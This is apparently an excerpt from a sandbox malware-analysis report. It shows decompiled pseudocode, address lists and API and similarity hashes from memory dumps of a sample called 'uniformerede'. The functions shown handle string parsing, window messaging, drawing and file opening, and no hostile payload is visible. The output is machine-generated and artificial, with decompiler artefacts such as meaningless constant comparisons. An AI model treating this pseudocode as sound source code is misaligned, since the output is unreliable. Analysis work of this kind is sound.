                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a5d
                                                                                                                                                                                                                            0x00402a66
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a9b
                                                                                                                                                                                                                            0x00402aa0
                                                                                                                                                                                                                            0x00402aa2
                                                                                                                                                                                                                            0x00402aa4
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402afd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aaa
                                                                                                                                                                                                                            0x00402ae5
                                                                                                                                                                                                                            0x00402aec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402af0
                                                                                                                                                                                                                            0x00402af3
                                                                                                                                                                                                                            0x00402af4
                                                                                                                                                                                                                            0x00402af5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402ab2
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ab7
                                                                                                                                                                                                                            0x00402abe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac2
                                                                                                                                                                                                                            0x00402ac5
                                                                                                                                                                                                                            0x00402ac6
                                                                                                                                                                                                                            0x00402ac7
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402b05
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a3b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID: "$"
                                                                                                                                                                                                                            • API String ID: 3213498283-3758156766
                                                                                                                                                                                                                            • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				short _v22;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				struct HWND__* _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t125 = __esi;
                                                                                                                                                                                                                            				_t124 = __edi;
                                                                                                                                                                                                                            				_t105 = __ebx;
                                                                                                                                                                                                                            				_t127 = _t128;
                                                                                                                                                                                                                            				_t129 = _t128 + 0xffffffe0;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x45750c);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t129;
                                                                                                                                                                                                                            				E004397DC();
                                                                                                                                                                                                                            				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                                                                                                                                                            					_t50 =  *0x49da70; // 0x422f48
                                                                                                                                                                                                                            					E00406A70(_t50,  &_v36);
                                                                                                                                                                                                                            					E0040D144(_v36, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(GetCapture() != 0) {
                                                                                                                                                                                                                            					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				ReleaseCapture();
                                                                                                                                                                                                                            				_t56 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            				E004596E4(_t56);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x4574ef);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                                                                                                                                                                                                            				_v32 = GetActiveWindow();
                                                                                                                                                                                                                            				_t60 =  *0x49be70; // 0x0
                                                                                                                                                                                                                            				_v20 = _t60;
                                                                                                                                                                                                                            				_t61 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				_t62 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                                                                                                                                                                                            				_t65 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                                                                                                                                                                                                            				_t66 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                                                                                                                                                                                                            				_t68 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                                                                                                                                                                                            				_t70 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                                                                                                                                                                                                            				_v16 = E00451600(0, _t105, _t124, _t125);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x4574cd);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				E00457194(_v8);
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x45742c);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t129;
                                                                                                                                                                                                                            				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_t80 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            					E0045A580(_t80, _t124, _t125);
                                                                                                                                                                                                                            					_t82 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            					if( *((char*)(_t82 + 0x9c)) == 0) {
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                                                                                                                                                                            							E004570F4(_v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                                                                                                                                                                            				} while (_t85 == 0);
                                                                                                                                                                                                                            				_v12 = _t85;
                                                                                                                                                                                                                            				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
                                                                                                                                                                                                                            				_t90 = E00441704(_v8);
                                                                                                                                                                                                                            				if(_t90 != GetActiveWindow()) {
                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t122);
                                                                                                                                                                                                                            				 *[fs:eax] = _t122;
                                                                                                                                                                                                                            				_push(0x457433);
                                                                                                                                                                                                                            				return E0045718C();
                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                            0x0045738c
                                                                                                                                                                                                                            0x00457396
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x004573a1
                                                                                                                                                                                                                            0x004573a6
                                                                                                                                                                                                                            0x004573b2
                                                                                                                                                                                                                            0x004573cd
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573b4
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573da
                                                                                                                                                                                                                            0x004573e0
                                                                                                                                                                                                                            0x004573e4
                                                                                                                                                                                                                            0x004573f9
                                                                                                                                                                                                                            0x00457401
                                                                                                                                                                                                                            0x0045740f
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457418
                                                                                                                                                                                                                            0x0045741b
                                                                                                                                                                                                                            0x0045741e
                                                                                                                                                                                                                            0x0045742b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                            • String ID: H/B
                                                                                                                                                                                                                            • API String ID: 862346643-184950203
                                                                                                                                                                                                                            • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                                                                                                                                                                                            • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043F510(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                                                                                                                                                                                            				struct tagRECT _v44;
                                                                                                                                                                                                                            				struct tagRECT _v60;
                                                                                                                                                                                                                            				void* _v68;
                                                                                                                                                                                                                            				int _v80;
                                                                                                                                                                                                                            				int _t79;
                                                                                                                                                                                                                            				void* _t134;
                                                                                                                                                                                                                            				int _t135;
                                                                                                                                                                                                                            				void* _t136;
                                                                                                                                                                                                                            				void* _t159;
                                                                                                                                                                                                                            				void* _t160;
                                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                                            				struct HDC__* _t162;
                                                                                                                                                                                                                            				intOrPtr* _t163;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t163 =  &(_v44.bottom);
                                                                                                                                                                                                                            				_t134 = __ecx;
                                                                                                                                                                                                                            				_t162 = __edx;
                                                                                                                                                                                                                            				_t161 = __eax;
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                            					_t79 =  *(_t161 + 0x19c);
                                                                                                                                                                                                                            					if(_t79 == 0) {
                                                                                                                                                                                                                            						L27:
                                                                                                                                                                                                                            						return _t79;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                                                                                                                                                                                            					if(_t79 < 0) {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v44.right = _t79 + 1;
                                                                                                                                                                                                                            					_t159 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t79 = E0041AC6C( *(_t161 + 0x19c), _t159);
                                                                                                                                                                                                                            						_t135 = _t79;
                                                                                                                                                                                                                            						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                                                                                                                                                                                            							_v44.left = CreateSolidBrush(E00424950(0xff000010));
                                                                                                                                                                                                                            							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                                                                                                                                                                                            							FrameRect(_t162,  &_v44, _v44);
                                                                                                                                                                                                                            							DeleteObject(_v60.right);
                                                                                                                                                                                                                            							_v60.left = CreateSolidBrush(E00424950(0xff000014));
                                                                                                                                                                                                                            							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                                                                                                                                                                                            							FrameRect(_t162,  &_v60, _v60);
                                                                                                                                                                                                                            							_t79 = DeleteObject(_v68);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t159 = _t159 + 1;
                                                                                                                                                                                                                            						_t75 =  &(_v44.right);
                                                                                                                                                                                                                            						 *_t75 = _v44.right - 1;
                                                                                                                                                                                                                            					} while ( *_t75 != 0);
                                                                                                                                                                                                                            					goto L27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t160 = 0;
                                                                                                                                                                                                                            				if(_t134 != 0) {
                                                                                                                                                                                                                            					_t160 = E0041ACC8(_t78, _t134);
                                                                                                                                                                                                                            					if(_t160 < 0) {
                                                                                                                                                                                                                            						_t160 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                                                                                                                                                                                            				if(_t160 <  *_t163) {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t136 = E0041AC6C( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                                                                                                                                                                                                            						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                                                                                                                                                                                            							E00419804( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                                                                                                                                                                                            							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                                                                                                                                                                                            								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                                                                                                                                                                                            									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v60.top = SaveDC(_t162);
                                                                                                                                                                                                                            								E004398B8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                                                                                                                                                                                            								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                                                                                                                                                                                            								E0043C130(_t136, _t162, 0xf, 0);
                                                                                                                                                                                                                            								RestoreDC(_t162, _v80);
                                                                                                                                                                                                                            								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t160 = _t160 + 1;
                                                                                                                                                                                                                            					} while (_t160 < _v60.top);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 375863564-0
                                                                                                                                                                                                                            • Opcode ID: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                                                                                                                                                                                            • Instruction ID: 085781c14da3806a19508914d9dc02b8af2cdac2da7d1e5622b20ea0d846e8a9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC516F71A04200ABD714EF69C8C5B5B77D8AF49308F04546AEE89CB397D738EC45CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E00402D70(void** __eax) {
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				long _t54;
                                                                                                                                                                                                                            				long _t55;
                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                            				void** _t59;
                                                                                                                                                                                                                            				DWORD* _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t59 = __eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                                                                                                                                                                            				if(0xffffffffffff284f == 0) {
                                                                                                                                                                                                                            					_t29 = 0x80000000;
                                                                                                                                                                                                                            					_t55 = 1;
                                                                                                                                                                                                                            					_t54 = 3;
                                                                                                                                                                                                                            					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(0xffffffffffff284f == 0) {
                                                                                                                                                                                                                            						_t29 = 0x40000000;
                                                                                                                                                                                                                            						_t55 = 1;
                                                                                                                                                                                                                            						_t54 = 2;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(0xffffffffffff284f != 0) {
                                                                                                                                                                                                                            							return 0xffffffffffff284d;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t29 = 0xc0000000;
                                                                                                                                                                                                                            						_t55 = 1;
                                                                                                                                                                                                                            						_t54 = 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t59[7] = E00402D04;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t59[9] = E00402D50;
                                                                                                                                                                                                                            				_t59[8] = E00402D00;
                                                                                                                                                                                                                            				if(_t59[0x12] == 0) {
                                                                                                                                                                                                                            					_t59[2] = 0x80;
                                                                                                                                                                                                                            					_t59[9] = E00402D00;
                                                                                                                                                                                                                            					_t59[5] =  &(_t59[0x53]);
                                                                                                                                                                                                                            					if(_t59[1] == 0xd7b2) {
                                                                                                                                                                                                                            						if(_t59 != 0x49e3e8) {
                                                                                                                                                                                                                            							_t31 = GetStdHandle(0xfffffff5);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t31 = GetStdHandle(0xfffffff4);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t31 = GetStdHandle(0xfffffff6);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t31 == 0xffffffff) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *_t59 = _t31;
                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                                                                                                                                                                            					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                            						L37:
                                                                                                                                                                                                                            						_t59[1] = 0xd7b0;
                                                                                                                                                                                                                            						return GetLastError();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *_t59 = _t38;
                                                                                                                                                                                                                            					if(_t59[1] != 0xd7b3) {
                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                            						if(_t59[1] == 0xd7b1) {
                                                                                                                                                                                                                            							L34:
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t34 = GetFileType( *_t59);
                                                                                                                                                                                                                            						if(_t34 == 0) {
                                                                                                                                                                                                                            							CloseHandle( *_t59);
                                                                                                                                                                                                                            							_t59[1] = 0xd7b0;
                                                                                                                                                                                                                            							return 0x69;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t34 == 2) {
                                                                                                                                                                                                                            							_t59[8] = E00402D04;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L34;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t59[1] = _t59[1] - 1;
                                                                                                                                                                                                                            					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t41 = _t40 - 0x81;
                                                                                                                                                                                                                            					if(_t41 < 0) {
                                                                                                                                                                                                                            						_t41 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                                                                                                                                                                            						_t58 = 0;
                                                                                                                                                                                                                            						if(_t44 != 1) {
                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t46 = 0;
                                                                                                                                                                                                                            						while(_t46 < _t58) {
                                                                                                                                                                                                                            							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                                                                                                                                                                            								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t46 = _t46 + 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L30;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f07
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402e14
                                                                                                                                                                                                                            0x00402e21
                                                                                                                                                                                                                            0x00402e22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e28
                                                                                                                                                                                                                            0x00402e2d
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e44
                                                                                                                                                                                                                            0x00402e59
                                                                                                                                                                                                                            0x00402e5e
                                                                                                                                                                                                                            0x00402e60
                                                                                                                                                                                                                            0x00000000
